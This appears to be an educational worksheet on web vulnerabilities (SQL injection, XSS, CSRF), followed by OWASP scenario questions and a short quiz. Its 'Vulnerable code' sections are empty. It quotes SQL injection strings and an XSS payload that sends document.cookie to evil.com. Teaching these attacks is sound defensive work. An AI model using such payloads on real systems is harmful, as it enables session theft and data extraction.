Every time you visit a website, your browser sends an HTTP request to a server, which responds with HTML, CSS, and JavaScript. But what happens between the request and response — and what happens when that process is exploited?
SQL injection (SQLi) occurs when user input is concatenated directly into SQL queries. Attackers can bypass authentication, extract data, or even drop tables.
Vulnerable code:
Payload: ' OR 1=1 -- bypasses authentication entirely.
Cross-site scripting (XSS) lets attackers inject malicious scripts into web pages viewed by others. Stored XSS saves the payload on the server; reflected XSS delivers it through a crafted link.
Vulnerable code:
Payload: <script>document.location='https://evil.com/?c='+document.cookie</script>
Cross-site request forgery (CSRF) tricks an authenticated user into performing actions they didn't intend, such as changing their email or transferring funds, by embedding a forged request in an image or link.
If the user is logged in, the browser automatically includes their session cookie.
Read each scenario and identify which OWASP Top 10 vulnerability is being described:
Scenario A: An attacker submits a review on an e-commerce site. When other users view the review page, a script steals their session cookies.
Scenario B: A logged-in user clicks a link that silently changes their account email address because the request is automatically authenticated.
Scenario C: An attacker enters ' UNION SELECT * FROM passwords -- into a login form and dumps the entire user table.
Design a comprehensive security checklist for deploying a production web application. Cover at least eight categories:
1. Which attack injects malicious scripts into a web page viewed by others?
2. What is the best defence against SQL injection?
3. CSRF exploits which feature of HTTP?